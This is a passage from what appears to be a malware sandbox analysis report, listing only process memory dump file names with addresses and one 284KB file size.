                                                                                                      • memory/5168-284-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5208-349-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5216-346-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5348-296-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                        Filesize

                                                                                                        284KB

                                                                                                      • memory/5348-298-0x0000000000401480-mapping.dmp
                                                                                                      • memory/5476-360-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5540-333-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5556-303-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5628-363-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5708-304-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5744-307-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5796-361-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5892-357-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5928-364-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5952-362-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5984-351-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6132-359-0x0000000000000000-mapping.dmp